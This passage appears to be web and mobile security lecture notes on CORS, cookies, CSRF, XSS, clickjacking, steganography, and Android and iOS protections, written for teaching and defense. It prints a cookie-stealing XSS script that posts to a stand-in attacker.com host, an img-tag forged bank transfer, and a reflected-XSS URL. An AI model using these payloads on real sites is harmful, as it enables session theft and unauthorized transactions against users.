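The three-part origin comparison can be sketched directly; the URLs below are illustrative, and default ports are filled in when a URL omits them:

```python
# Sketch: same-origin check. Two URLs share an origin only if scheme,
# hostname, and port all match.
from urllib.parse import urlsplit

def same_origin(url_a: str, url_b: str) -> bool:
    a, b = urlsplit(url_a), urlsplit(url_b)
    default = {"http": 80, "https": 443}
    return (a.scheme == b.scheme
            and a.hostname == b.hostname
            and (a.port or default.get(a.scheme))
                == (b.port or default.get(b.scheme)))

print(same_origin("https://site.com/a", "https://site.com/b"))    # True: same origin
print(same_origin("https://site.com", "http://site.com"))         # False: scheme differs
print(same_origin("https://site.com", "https://api.site.com"))    # False: host differs
```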

Cross-Origin Resource Sharing (CORS)

Modern web applications routinely load content from multiple origins. A single page might include analytics scripts from Google, fonts from a CDN, and interactive elements from a separate application domain. This modularity improves performance, reduces redundancy, and allows the integration of specialized services. However, it also introduces potential security risks since the same-origin policy would ordinarily block interaction between different origins.

Cross-Origin Resource Sharing (CORS) is a standardized mechanism that enables secure cross-origin requests. It allows servers to specify which external origins are permitted to access their resources via HTTP headers.

For example:

Access-Control-Allow-Origin: https://trusted-site.com

This tells the browser that scripts from https://trusted-site.com can access resources from the server as if they were of the same origin. CORS is essential for enabling the safe, flexible, and secure integration of third-party services in web applications.


Cookies and Web State

Cookies store small name-value pairs of data in the browser and are sent with each HTTP request to the matching domain and path. They allow websites to maintain state across page loads and sessions.

Cookies are used for three main purposes:

  • Session management: Identify logged-in users, maintain session state, and manage items like shopping carts or form progress.
  • Personalization: Store user preferences such as language, layout, or theme for a customized experience.
  • Tracking: Monitor user behavior across visits or across sites (via third-party cookies), enabling analytics and targeted advertising.

Cookie Types by Duration

  • Session cookies: Temporary; stored in memory and deleted when the browser closes. Commonly used for login sessions or temporary interactions.
  • Persistent cookies: Stored on disk with an expiration date; used to remember user preferences or identifiers across browser restarts.

Cookie Types by Origin

  • First-party cookies: Set by the domain in the browser’s address bar; used to maintain sessions, settings, and internal functionality.
  • Third-party cookies: Set by embedded content from external domains (e.g., ads or trackers). Primarily used for tracking users across different websites.

Cookie Flags

  • HttpOnly: Blocks access from JavaScript, helping protect session cookies from XSS attacks.
  • Secure: Restricts the cookie to HTTPS connections, protecting it from being sent over insecure channels.
  • SameSite: Controls whether cookies are sent on cross-site requests. Helps mitigate CSRF attacks.

Cookies are further scoped by domain and path, limiting when they are included in requests. Due to privacy concerns, modern browsers are moving toward restricting or phasing out third-party cookies.

Cross-Site Request Forgery (CSRF)

CSRF exploits browser behavior by inducing users to send authenticated requests to a site without their knowledge.

Example:

If a user is logged into their bank, an attacker can embed a request to transfer money in an image tag:

<img src="https://bank.com/transfer?amount=1000&to=attacker" />

Defenses:

  • CSRF tokens: Embed a unique token in each form; the server verifies it on submission to ensure the request came from the correct user.
  • SameSite cookies: Prevent cookies from being sent in cross-site requests unless explicitly allowed.
  • Referer or Origin header validation: Ensure the request came from the expected domain.
  • Log out users after inactivity: Reduces the time window for a successful CSRF attempt.
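
The CSRF-token defense listed above can be sketched with an HMAC: the server derives a token from the session ID and a server-side secret, embeds it in each form, and verifies it on submission. The secret and session ID here are illustrative placeholders:

```python
# Sketch: HMAC-based CSRF tokens. A forged cross-site request cannot
# include a valid token because the attacker never sees the secret.
import hashlib
import hmac

SECRET_KEY = b"server-side-secret"         # hypothetical server secret

def make_csrf_token(session_id: str) -> str:
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def check_csrf_token(session_id: str, token: str) -> bool:
    # Constant-time comparison resists timing attacks.
    return hmac.compare_digest(make_csrf_token(session_id), token)

token = make_csrf_token("session-abc123")  # embedded in the form by the server
print(check_csrf_token("session-abc123", token))      # legitimate submission
print(check_csrf_token("session-abc123", "forged"))   # CSRF attempt: rejected
```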

Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks inject malicious scripts into web pages that are then executed in the browser of users who visit the affected pages. These scripts run with the same privileges as trusted content, allowing attackers to hijack sessions, steal cookies, manipulate the DOM, or redirect users to malicious sites.

Stored (Persistent) XSS

In a stored XSS attack, the malicious script is permanently stored on the server—typically in a database, forum post, user profile, comment, or message. Every time a victim loads the affected page, the script is delivered as part of the content and runs in their browser.

Example:

  • An attacker posts a comment like:
  <script>fetch('https://attacker.com/steal?cookie=' + document.cookie)</script>

  • Any user viewing the comment will execute the script, unknowingly leaking their session data to the attacker.

Stored XSS is especially dangerous because:

  • It does not require social engineering after the script is planted.
  • It can affect many users who simply view the page.
  • It persists until removed from the server or sanitized.

Reflected XSS

In reflected XSS, the malicious input is not stored but instead immediately returned in a server response. The attack usually involves a crafted URL containing a payload in a query parameter or fragment that the server echoes into the HTML page without proper sanitization.

Example:

  • A victim clicks a malicious link such as:
  https://example.com/search?q=<script>steal()</script>

  • The server embeds the q parameter directly into the response page:
  Search results for: <script>steal()</script>

  • The script runs as soon as the page loads, allowing the attacker to perform actions on the victim’s behalf or exfiltrate data.

Reflected XSS:

  • Typically requires the attacker to trick the victim into clicking a malicious link.
  • Is often delivered through phishing emails, social media messages, or malicious advertisements.
  • Affects only the users who interact with the crafted URL.

Defenses

  • Input validation and output encoding: Reject or sanitize dangerous characters before inserting input into the page. Always encode untrusted output into HTML, JavaScript, or attributes.
  • Secure templating engines: Use libraries that automatically escape output (e.g., Django, Handlebars, React JSX).
  • Content Security Policy (CSP): Restrict the sources from which scripts can be loaded, and disallow inline JavaScript.
  • HttpOnly cookies: Prevent JavaScript from accessing cookies, reducing the impact of successful attacks.
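
The output-encoding defense can be sketched with Python's standard html module: untrusted input is escaped before being placed in the page, so the reflected-XSS payload from the earlier example renders as inert text instead of executing:

```python
# Sketch: HTML-escaping untrusted input before inserting it into a page.
import html

def render_search_results(user_query: str) -> str:
    return f"Search results for: {html.escape(user_query)}"

page = render_search_results("<script>steal()</script>")
print(page)   # the angle brackets become &lt; and &gt;, so no script runs
```

Note that the correct encoding depends on context: HTML body, attribute values, JavaScript strings, and URLs each need different escaping, which is why auto-escaping template engines are preferred over hand-rolled filters.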

Clickjacking

Clickjacking is a deceptive technique where an attacker tricks a user into clicking on something different from what the user perceives, typically by layering transparent or disguised elements over visible content.

For example, an attacker might embed a legitimate site (like a social media or banking page) inside a transparent <iframe> that is positioned over a fake button. When the user thinks they’re clicking the fake button (e.g., “Claim Prize”), they’re actually clicking a hidden button on the legitimate site, such as “Like,” “Confirm,” or “Transfer.”

Potential consequences of clickjacking include:

  • Submitting forms or triggering actions without the user’s knowledge.
  • Changing security settings or authorizing transactions.
  • Unintended interaction with social media (e.g., liking a post, following an account).
  • Installing malware or enabling browser/device features (e.g., webcam).

Defenses against clickjacking include:

  • X-Frame-Options header: Tells the browser whether the page can be embedded in an <iframe>. Set to DENY or SAMEORIGIN to prevent third-party framing.
  • Content Security Policy (CSP): The frame-ancestors directive restricts which origins can embed the page.
  • JavaScript frame-busting: Pages can include scripts that check if the current window is the top-level window:
  if (window.top !== window.self) {
    window.top.location = window.location;
  }

However, client-side checks are not foolproof and should be combined with server-side headers.

WebAssembly and Browser Extensions

WebAssembly (Wasm) allows compiled binary code to run in browsers, increasing performance—but also making malicious code harder to inspect.

Browser extensions, especially those with wide permissions, can exfiltrate data or modify content. They pose a significant risk if poorly vetted.

DNS Rebinding

An attacker can exploit DNS to change a domain’s IP address after the browser has cached it, tricking it into treating a new server as the same origin.

Defenses:

  • Prevent DNS resolution of external names to private IP addresses
  • Pin DNS results in the browser (enforce a minimum TTL) so a domain’s IP address cannot change mid-session

Homograph and Typosquatting Attacks

Homograph attacks use visually similar Unicode characters to deceive users:

  • paypaI.com (with a capital ‘I’) vs. paypal.com

Typosquatting registers domain names that are slight misspellings of legitimate ones, hoping users will make typographical errors. Examples: gooogle.com, amaz0n.com.

Combosquatting is a related tactic where attackers register plausible-looking domain variants by appending or inserting words to mimic a real brand. Examples: chase-bank-login.com, paypal-support.site.

Both techniques are used in phishing, ad fraud, and malware distribution campaigns.

Package Repository Attacks

Attackers upload malicious libraries to public repositories using:

  • Typosquatting: e.g., requet instead of request
  • Dependency confusion: Exploiting mismatches between internal and public package namespaces

These attacks have successfully targeted major companies like Apple, Shopify, and Tesla.

Tracking via Images

Image tags (<img>) are treated as passive content, but they can be used to track users when embedded with unique URLs or placed invisibly in pages or emails.

A tracking pixel is a 1×1 image whose URL includes identifiers or page-specific data. When loaded:

  • The browser sends a request to the image’s server.
  • All cookies associated with that domain are included.
  • The URL may carry parameters identifying the user or page.
  • The server logs this along with IP, user agent, and referer data.

This allows the server to track views of a message or web page and correlate user activity across multiple sites or visits—even without JavaScript.

Tracking pixels are common in advertising, email marketing, and third-party analytics.

Deception and Spoofing

Social engineering attacks exploit:

  • Status bar spoofing via JavaScript
  • Misleading display vs. landing URLs
  • Fake site layouts using cloned CSS and images

Users may be tricked into disclosing credentials or installing malware, believing the site is legitimate.

Conclusion

Modern web security must address a massive attack surface introduced by scripts, dynamic content, and third-party services. Developers must validate all inputs, isolate content using SOP and CORS, and secure user state with proper cookie attributes and CSP. Browser vendors, site administrators, and developers all play roles in reducing risk in this adversarial ecosystem.

Steganography

Cryptography’s goal is to hide the contents of a message. Steganography’s goal is to hide the very existence of the message. Classic techniques included the use of invisible ink, writing a message on one’s head and allowing the hair to cover it, microdots, and carefully-clipped newspaper articles that together communicate the message.

A null cipher is one where the actual message is hidden among irrelevant data. For example, the message may comprise the first letter of each word (or each sentence, or every second letter, etc.). Chaffing and winnowing entails the transmission of a bunch of messages, of which only certain ones are legitimate. Each message is signed with a key known only to trusted parties (e.g., a MAC). Intruders can see the messages but can’t validate the signatures to distinguish the valid messages from the bogus ones.
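
The first-letter variant of the null cipher can be sketched in one line; the cover text is an illustrative example:

```python
# Sketch: extracting a null-cipher message hidden as the first letter
# of each word of an innocuous cover text.

def extract_null_cipher(cover_text: str) -> str:
    return "".join(word[0] for word in cover_text.split())

print(extract_null_cipher("How everyone loves pie"))   # prints "Help"
```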

Messages can be embedded into images. There are a couple of ways of hiding a message in an image:

  1. A straightforward method to hide a message in an image is to use low-order bits of an image, where the user is unlikely to notice slight changes in color. An image is a collection of RGB pixels. You can mess around with the least-significant bits and nobody will notice changes in the image, so you can just encode the entire message by spreading the bits of the message among the least-significant bits of the image.

  2. You can do a similar thing but apply a frequency domain transformation, like JPEG compression does, by using a Discrete Cosine Transform (DCT). The frequency domain maps the image as a collection ranging from high-frequency areas (e.g., “noisy” parts such as leaves, grass, and edges of things) through low-frequency areas (e.g., a clear blue sky). Changes to high frequency areas will mostly be unnoticed by humans: that’s why jpeg compression works. It also means that you can add your message into those areas and then transform it back to the spatial domain. Now your message is spread throughout the higher-frequency parts of the image and can be extracted if you do the DCT again and know where to look for the message.
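
The least-significant-bit method (item 1 above) can be sketched over a flat array of pixel color bytes; a real image library would supply the bytes, so the pixel data here is illustrative:

```python
# Sketch: LSB steganography. Each bit of the message overwrites the
# least-significant bit of one pixel color byte, changing each byte by
# at most 1 -- invisible to the eye.

def embed(pixels: list[int], message: bytes) -> list[int]:
    bits = [(byte >> i) & 1 for byte in message for i in range(7, -1, -1)]
    out = pixels[:]
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit     # replace the low-order bit
    return out

def extract(pixels: list[int], length: int) -> bytes:
    bits = [p & 1 for p in pixels[:length * 8]]
    return bytes(
        sum(bit << (7 - i) for i, bit in enumerate(bits[j:j + 8]))
        for j in range(0, len(bits), 8)
    )

pixels = list(range(200, 250))             # stand-in for RGB byte data
stego = embed(pixels, b"hi")
assert extract(stego, 2) == b"hi"          # message recovered
assert all(abs(a - b) <= 1 for a, b in zip(pixels, stego))  # imperceptible
```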

Many laser printers embed a serial number and date simply by printing very faint patterns of yellow dots.

Steganography is closely related to watermarking, and the terms “steganography” and “watermarking” are often used interchangeably.

The primary goal of watermarking is to create an indelible imprint on a message such that an intruder cannot remove or replace the message. It is often used to assert ownership, authenticity, or encode DRM rules. The message may be, but does not have to be, invisible.

The goal of steganography is to allow primarily one-to-one communication while hiding the existence of a message. An intruder – someone who does not know what to look for – cannot even detect the message in the data.

App Integrity

Android enforces integrity through application signing and app verification processes. Developers sign their apps with a private key, and the corresponding public key is used to verify the app’s integrity upon installation. The Google Play Store further reinforces this by vetting apps before they are available for download, ensuring that only those that haven’t been tampered with are accessible to users.
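
The install-time integrity check can be sketched in simplified form. Real Android signing (the APK v2/v3 schemes) signs a digest of the package with the developer's private key; the sketch below uses a bare SHA-256 digest as a stand-in, and the variable names are hypothetical.

```python
import hashlib

def package_digest(app_bytes: bytes) -> str:
    """Digest over the entire app package."""
    return hashlib.sha256(app_bytes).hexdigest()

def verify_integrity(app_bytes: bytes, expected_digest: str) -> bool:
    """Install-time check: reject any package whose contents changed."""
    return package_digest(app_bytes) == expected_digest

# At signing time (in reality, this digest would itself be signed with the
# developer's private key so an attacker cannot replace it).
app = b"...compiled app code and resources..."
signed_digest = package_digest(app)

print(verify_integrity(app, signed_digest))        # untampered: accepted
print(verify_integrity(app + b"!", signed_digest)) # tampered: rejected
```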

The Android app sandbox

Android supports only a single user and uses Linux user IDs to isolate app privileges. Under Android, each app normally runs under a different user ID. Hence, apps are isolated and can access only their own resources. Access requests to other objects involve messages that pass through a gatekeeper, which validates the requests.

Two mechanisms are used to enforce file access permissions:

  1. Linux file permissions: These provide discretionary access control, allowing the owner (and root) to change permissions to allow others access to the files. With this mechanism, an app can decide to share a data file.

  2. SELinux mandatory access control: Certain data and cache directories in Android are protected with the SELinux (Security-Enhanced Linux) mandatory access control (MAC) kernel extension. This ensures that even the owner cannot change access permissions for the files.
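
The discretionary half of this scheme can be demonstrated with standard POSIX permission calls. This is a minimal sketch using Python's `os` module on Linux; the SELinux mandatory policies, which would override these discretionary bits, are not modeled here.

```python
import os
import stat
import tempfile

# A stand-in for an app's private data file.
fd, path = tempfile.mkstemp()
os.close(fd)

# Private: only the owning user (i.e., the owning app's UID) can read/write.
os.chmod(path, 0o600)
print(oct(stat.S_IMODE(os.stat(path).st_mode)))   # rw-------

# Discretionary: the owner may *choose* to let other users read the file.
os.chmod(path, 0o644)
print(oct(stat.S_IMODE(os.stat(path).st_mode)))   # rw-r--r--

os.remove(path)
```

Under SELinux mandatory access control, a policy can forbid exactly this kind of owner-initiated sharing for protected directories, regardless of what `chmod` says.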

Internal storage provides a per-app private directory for files used by each application. External storage (e.g., attached microSD cards or USB devices) is shared among all apps and, of course, may be moved to other computers.

Other protections

The Linux operating system provides per-process memory isolation and address space layout randomization (ASLR). Linux also uses no-execute (NX) protection on stack and heap memory pages if the processor supports it.

The Java compiler provides stack canaries, and its memory management libraries provide some heap overflow protections (checks of backward & forward pointers in dynamically allocated structures).

Android supports whole disk encryption so that if a device is stolen, an attacker will not be able to easily recover file contents even with raw access to the flash file system.

Unlike iOS, Android supports the concurrent execution of multiple apps. It is up to the developer to be frugal with battery life. Apps store their state in persistent memory so they can be stopped and restarted at any time. This ability to stop an app also helps against DoS attacks, since a stopped app is not accepting requests or using system resources.

iOS security

App signing

iOS requires mandatory code signing. Unlike Android, which accepts self-signed certificates, the app package must be signed using an Apple Developer certificate, and apps are distributed only through the Apple App Store. This does not ensure the trustworthiness of an app, but it identifies the registered developer and ensures that the app has not been modified after it has been signed.

Runtime protection

Apple’s iOS provides runtime protection via OS-level sandboxing using a kernel-level sandbox. System resources and the kernel are shielded from user apps. The sandbox limits which system calls an app can make and the parameters to system calls. Except through kernel exploits, an app cannot leave its sandbox.

The app sandbox restricts the ability of one app to access another app’s data and resources. Each app has its own sandbox directory. The OS enforces the sandbox and permits access only to files within that directory, as well as restricted access to system preferences, the network, and other resources.

Inter-app communication can take place only through iOS APIs. Code generation by an app is prevented because data memory pages cannot be made executable and executable memory pages are not writable by user processes.

Data protection

All file contents are encrypted with a unique 256-bit AES per-file key, which is generated when the file is created.

This per-file key is encrypted with a class key and is stored along with the file’s metadata, which is part of the file system that describes attributes of the file, such as size, modification time, and access permissions.

The class key is generated from a hardware key in the device and the user’s passcode. Unless the passcode is entered, the class key cannot be created and the file key cannot be decrypted.

The file system’s metadata is also encrypted. A file system key is used for this, which is derived directly from the hardware key, which is generated when iOS is installed. Keys are stored in Apple’s Secure Enclave, a separate processor and isolated memory that cannot be accessed directly by the main processor. Encrypting metadata encrypts the entire structure of the file system. Someone who rips out the flash memory from an iOS device and examines it can see neither file contents (they are encrypted with per-file keys) nor information about those files (the metadata is encrypted with a file system key).
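
The key hierarchy above can be sketched as a chain of derivations. This is an illustrative model only: real iOS wraps keys with AES inside the Secure Enclave, whereas this sketch uses PBKDF2 and an HMAC-derived XOR mask as stand-ins, and all key values are made up.

```python
import hashlib
import hmac
import os

hardware_key = os.urandom(32)   # stand-in for the key fused into the device
passcode = b"123456"            # stand-in for the user's passcode

# Class key: derived from the hardware key *and* the passcode, so it cannot
# be recreated unless the passcode is entered on this device.
class_key = hashlib.pbkdf2_hmac("sha256", passcode, hardware_key, 100_000)

# Per-file key: random, generated when the file is created.
file_key = os.urandom(32)

# "Wrap" the file key under the class key (XOR mask here, AES in reality);
# the wrapped key is what gets stored alongside the file's metadata.
mask = hmac.new(class_key, b"file-key-wrap", hashlib.sha256).digest()
wrapped = bytes(a ^ b for a, b in zip(file_key, mask))

# Unwrapping requires re-deriving the class key, i.e., knowing the passcode.
unwrap_mask = hmac.new(class_key, b"file-key-wrap", hashlib.sha256).digest()
recovered = bytes(a ^ b for a, b in zip(wrapped, unwrap_mask))
assert recovered == file_key
```

With the wrong passcode, a different class key is derived, the mask does not match, and the file key cannot be recovered.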

A hardware AES engine encrypts and decrypts each file as it is written to or read from flash memory, so file encryption is transparent and efficient.

The iOS kernel partition is mounted read-only, so even if an app manages to break out of its sandbox due to some vulnerability and gain root access, it will still not have permission to modify the kernel.

Additional kernel and hardware protection

In addition to the sandbox, iOS also uses address space layout randomization (ASLR) and memory execute protection for stack and heap pages via ARM’s Execute Never (XN) memory page flag.

Hardware support for security

ARM TrustZone worlds

All Android and iOS phones currently use ARM processors. ARM provides a dedicated security module, called TrustZone, that coexists with the normal processor. The hardware is separated into two “worlds”: secure (trusted) and non-secure (non-trusted) worlds. Any software resides in only one of these two worlds and the processor executes in only one world at a time.

Each of these worlds has its own operating system and applications. Android systems run an operating system called Trusty TEE in the secure world and, of course, Linux in the untrusted world.

Logically, you can think of the two worlds as two distinct processors, each running their own operating system with their own data and their own memory. Non-secure applications cannot directly access any memory or registers belonging to secure resources. The only way they can communicate is through a messaging API.

In practice, the hardware creates two virtual cores for each CPU core, managing separate registers and all processing state in each world.

The phone’s operating system and all applications reside in the non-trusted world. Secure components, such as cryptographic keys, signature services, encryption services, and payment services live in the trusted world. Even the operating system kernel does not have access to any of the code or data in the trusted world. Hence, even if an app manages a privilege escalation attack and gains root access, it will be unable to access certain security-critical data.
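
The relationship between the two worlds can be modeled as a message-passing boundary. This is only a conceptual sketch: a Python object cannot enforce real hardware isolation, the class and key names are invented, and HMAC signing stands in for whatever services the trusted world actually offers.

```python
import hmac
import hashlib

class SecureWorld:
    """Models the trusted world: the key never leaves this object."""

    def __init__(self):
        self._key = b"device-secret-key"   # hypothetical device key

    def handle(self, request):
        """The messaging API: the only entry point from the normal world."""
        op, payload = request
        if op == "sign":
            # Perform the operation inside the secure world and return
            # only the result, never the key itself.
            return hmac.new(self._key, payload, hashlib.sha256).hexdigest()
        return None   # any other request, including key export, is refused

# Normal world: may request services but cannot read the key directly.
tz = SecureWorld()
sig = tz.handle(("sign", b"payment: $5 to Alice"))
print(sig)
print(tz.handle(("export_key", b"")))   # refused
```

Even a root-level compromise of the normal world would, in this model, still only see the messaging API, not the key material behind it.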

Applications for the trusted world include key management, secure boot, digital rights management, secure payment processing, mobile payments, and biometric authentication.

Apple Secure Enclave

Apple uses modified ARM processors for iPhones and iPads. In 2013, they announced Secure Enclave for their processors. The details are confidential but it appears to be similar in function to ARM’s TrustZone but designed as a physically separate coprocessor. As with TrustZone, the Secure Enclave coprocessor runs its own operating system (a modified L4 microkernel in this case).

The processor has its own secure bootloader and custom software update mechanism. It uses encrypted memory so that anything outside the Secure Enclave cannot access its data. It provides:

  • All cryptographic operations for data protection & key management.
  • Random number generation.
  • Secure key store, including Touch ID (fingerprint) and the Face ID neural network.
  • Data storage for payment processing.

The Secure Enclave maintains the confidentiality and integrity of data even if the iOS kernel has been compromised.


Last modified December 7, 2024.